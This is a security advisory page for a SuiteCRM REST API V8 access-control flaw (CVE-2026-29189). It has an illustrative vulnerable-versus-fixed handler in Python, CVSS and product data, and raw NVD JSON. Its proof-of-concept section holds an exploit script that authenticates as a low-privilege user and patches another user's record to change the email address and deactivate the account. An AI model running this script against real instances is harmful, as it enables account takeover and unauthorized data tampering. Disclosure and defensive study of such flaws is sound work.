Security Vulnerability Report
CVE-2026-29189 CVSS 8.1 HIGH

Published: 2026-03-20 00:16:16
Last Modified: 2026-03-23 16:46:51

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 (7.x line) and 8.9.3 (8.x line), the SuiteCRM REST API V8 is missing ACL (Access Control List) checks on several endpoints: the API authenticates the caller but then acts on whatever record identifier the caller supplies, so any authenticated user, including a low-privilege one, can read and modify records that the application's ACLs should have denied them. Versions 7.15.1 and 8.9.3 patch the issue.

Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)
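The flaw described above, a PATCH handler that honours a caller-supplied record id without checking the caller's rights to that record, shown beside its hardened form. This is an added Python illustration and not SuiteCRM code: the in-memory record store, the two users, the simplified ACL model ("all", "owner" or "none" per module and action) and every function name are assumptions constructed for the example; only the JSON:API request shape (data.type, data.id, data.attributes) mirrors what the V8 API accepts.

```python
import copy

# Constructed sample users (an assumption, not SuiteCRM's user table).
USERS = {
    "u-admin": {"is_admin": True},
    "u-low": {"is_admin": False},
}


def fresh_store():
    """Return an independent copy of the constructed record store, keyed by
    module name and then record id, so each call can mutate it freely."""
    return copy.deepcopy({
        "Users": {
            "u-admin": {"assigned_user_id": "u-admin",
                        "email_address": "admin@example.com", "status": "Active"},
            "u-low": {"assigned_user_id": "u-low",
                      "email_address": "low@example.com", "status": "Active"},
        },
        "Accounts": {
            "acc-1": {"assigned_user_id": "u-admin", "name": "Acme Ltd"},
        },
    })


# Simplified ACL model (assumed for the example): for each module and action,
# "all" lets any user through, "owner" only the assigned user, "none" nobody.
ACL = {
    "Users": {"view": "owner", "edit": "owner"},
    "Accounts": {"view": "all", "edit": "owner"},
}


def is_allowed(user_id, module, action, record):
    """Decide whether user_id may perform action on this record of module."""
    if USERS[user_id]["is_admin"]:
        return True
    level = ACL.get(module, {}).get(action, "none")
    if level == "all":
        return True
    if level == "owner":
        return record["assigned_user_id"] == user_id
    return False


def jsonapi_patch(module, record_id, **attributes):
    """Build a JSON:API style PATCH body of the shape the V8 API accepts."""
    return {"data": {"type": module, "id": record_id, "attributes": attributes}}


def patch_record_vulnerable(store, user_id, payload):
    """The flawed handler: the caller is authenticated (user_id is trusted),
    but no ACL check is made, so the caller-chosen id selects any record."""
    data = payload["data"]
    record = store.get(data["type"], {}).get(data["id"])
    if record is None:
        return 404, None
    record.update(data["attributes"])
    return 200, record


def patch_record_fixed(store, user_id, payload):
    """The hardened handler: resolve the record, then enforce view and edit
    rights for this caller before any write happens."""
    data = payload["data"]
    module, record_id = data["type"], data["id"]
    record = store.get(module, {}).get(record_id)
    # A record the caller may not even view is reported as missing, so the
    # endpoint does not confirm which ids exist.
    if record is None or not is_allowed(user_id, module, "view", record):
        return 404, None
    if not is_allowed(user_id, module, "edit", record):
        return 403, None
    record.update(data["attributes"])
    return 200, record


if __name__ == "__main__":
    # A low-privilege user tries to deactivate the administrator account.
    body = jsonapi_patch("Users", "u-admin", status="Inactive")
    print("vulnerable:", patch_record_vulnerable(fresh_store(), "u-low", body))
    print("fixed:     ", patch_record_fixed(fresh_store(), "u-low", body))
```

The two handlers differ only in the ACL gate, which is exactly the kind of omission the advisory describes; the fixed version also distinguishes "cannot see" (404) from "can see but cannot change" (403) so that the error code itself does not leak which identifiers exist.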

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* (versions before 7.15.1) - VULNERABLE
cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* (versions from 8.0.0 up to but excluding 8.9.3) - VULNERABLE
SuiteCRM < 7.15.1
SuiteCRM >= 8.0.0 and < 8.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys
import requests

# Target configuration (placeholders). The API base path, the login endpoint
# and the token field name below are assumptions about the target deployment
# and must be adjusted to whatever authentication the instance actually exposes.
target_host = "http://example.com"
api_base = f"{target_host}/api/V8"
login_url = f"{api_base}/login"

# Low-privilege user credentials
attacker_user = "lowpriv_user"
attacker_pass = "password123"

# Step 1: Authenticate and get a session token
session = requests.Session()
login_payload = {"username": attacker_user, "password": attacker_pass}
resp = session.post(login_url, json=login_payload, timeout=10)
if resp.status_code != 200:
    print(f"Login failed: HTTP {resp.status_code}")
    sys.exit(1)

# Extract the token (assuming a standard token-bearing response structure)
token = resp.json().get("token")
if not token:
    print("Login succeeded but no token was returned")
    sys.exit(1)
headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/vnd.api+json",
}

# Step 2: Exploit the broken access control
# Attempt to update a record (e.g. another user's profile) that the
# low-privilege user should not be able to touch. The module route is an
# assumption; the record type in the body must match the module addressed.
target_record_id = "admin_user_id_or_target_record_id"
exploit_url = f"{api_base}/module/Users/{target_record_id}"

# Payload to modify data (e.g. changing the email address or status)
payload = {
    "data": {
        "type": "Users",
        "id": target_record_id,
        "attributes": {
            "email_address": "attacker@example.com",  # placeholder: an attacker-controlled address
            "status": "Inactive",
        },
    }
}

response = session.patch(exploit_url, json=payload, headers=headers, timeout=10)
# A 200 here on a record the low-privilege user does not own indicates the
# missing ACL check; a patched instance should answer 403 (or 404).
print(f"Exploit Status: {response.status_code}")
print(f"Response Body: {response.text}")

References

https://docs.suitecrm.com/admin/releases/7.15.x (Release Notes)
https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-m6x8-3hxp-qxwv (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-29189",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T00:16:16.303",
    "lastModified": "2026-03-23T16:46:51.237",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, the SuiteCRM REST API V8 has missing ACL (Access Control List) checks on several endpoints, allowing authenticated users to access and manipulate data they should not have permission to interact with. Versions 7.15.1 and 8.9.3 patch the issue."},
      {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Antes de las versiones 7.15.1 y 8.9.3, la API REST V8 de SuiteCRM carece de comprobaciones de ACL (Lista de Control de Acceso) en varios puntos finales, lo que permite a los usuarios autenticados acceder y manipular datos con los que no deberían tener permiso para interactuar. Las versiones 7.15.1 y 8.9.3 parchean el problema."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-m6x8-3hxp-qxwv", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}